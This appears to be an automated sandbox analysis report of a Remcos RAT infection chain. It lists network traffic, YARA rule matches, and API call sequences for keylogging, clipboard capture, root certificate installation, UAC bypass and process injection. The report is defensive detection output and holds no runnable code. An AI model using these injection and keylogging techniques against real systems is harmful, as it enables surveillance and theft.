Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000

19_2_0040A2F3

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,

19_2_0040B749

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		19_2_004168FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F57633 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,		19_2_06F57633

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,

19_2_0040B749

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

19_2_0040A41B

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AnyDesk.PIF PID: 3288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED

Registers a new ROOT certificate

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A1B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,

6_2_00007FF6A2A1B684

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041CA6D SystemParametersInfoW,	19_2_0041CA6D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0041CA73 SystemParametersInfoW,	19_2_0041CA73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5D7A4 SystemParametersInfoW,	19_2_06F5D7A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F5D7AA SystemParametersInfoW,	19_2_06F5D7AA

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF6A2A5E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A9A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A225E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF6A2A225E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A229A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6A2A229A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF6A2A4EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A50F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF6A2A50F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF6A2A60EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96EA8 NCryptImportKey,#360,	6_2_00007FF6A2A96EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A6342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A993A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A993A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF6A2A5184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A998B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A998B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF6A29FFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF6A29EF9B8

System Summary

Malicious sample detected (through community Yara rule)

Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Found large BAT file

Source: saw.bat

Static file information: 2921546

Source: C:\Windows\SysWOW64\colorcpl.exe

Process Stats: CPU usage > 49%

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	3_2_00007FF7823E7FF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	3_2_00007FF7823FBCF0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	3_2_00007FF7823E8114
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	3_2_00007FF7823E88C0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	3_2_00007FF7823D3D94
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E898C NtQueryInformationToken,	3_2_00007FF7823E898C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	3_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,	3_2_00007FF7823E89E4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	5_2_00007FF7823E7FF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	5_2_00007FF7823FBCF0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	5_2_00007FF7823E8114
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	5_2_00007FF7823E88C0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	5_2_00007FF7823D3D94
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E898C NtQueryInformationToken,	5_2_00007FF7823E898C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	5_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,	5_2_00007FF7823E89E4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ABC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,	6_2_00007FF6A2ABC964
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,	9_2_02ABB118
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB7A2C NtAllocateVirtualMemory,	9_2_02AB7A2C
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	9_2_02ABDC8C
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02ABDC04
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB7D78 NtWriteVirtualMemory,	9_2_02AB7D78
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	9_2_02ABDD70
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB84C8 NtProtectVirtualMemory,	9_2_02AB84C8
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB7A2A NtAllocateVirtualMemory,	9_2_02AB7A2A
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_02ABDBB0
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB8D6E GetThreadContext,SetThreadContext,NtResumeThread,	9_2_02AB8D6E
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB8D70 GetThreadContext,SetThreadContext,NtResumeThread,	9_2_02AB8D70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	10_2_00007FF7823E7FF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	10_2_00007FF7823E8114
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	10_2_00007FF7823FBCF0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	10_2_00007FF7823E88C0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	10_2_00007FF7823D3D94
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E898C NtQueryInformationToken,	10_2_00007FF7823E898C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	10_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,	10_2_00007FF7823E89E4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	11_2_00007FF7823E7FF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	11_2_00007FF7823E8114
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823FBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	11_2_00007FF7823FBCF0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	11_2_00007FF7823E88C0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823D3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	11_2_00007FF7823D3D94
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E898C NtQueryInformationToken,	11_2_00007FF7823E898C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF782401538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	11_2_00007FF782401538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7823E89E4 NtQueryInformationToken,NtQueryInformationToken,	11_2_00007FF7823E89E4
Source: C:\Users\Public\alpha.pif	Code function: 16_2_008664CA NtQueryInformationToken,	16_2_008664CA
Source: C:\Users\Public\alpha.pif	Code function: 16_2_00864823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	16_2_00864823
Source: C:\Users\Public\alpha.pif	Code function: 16_2_0086643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	16_2_0086643A
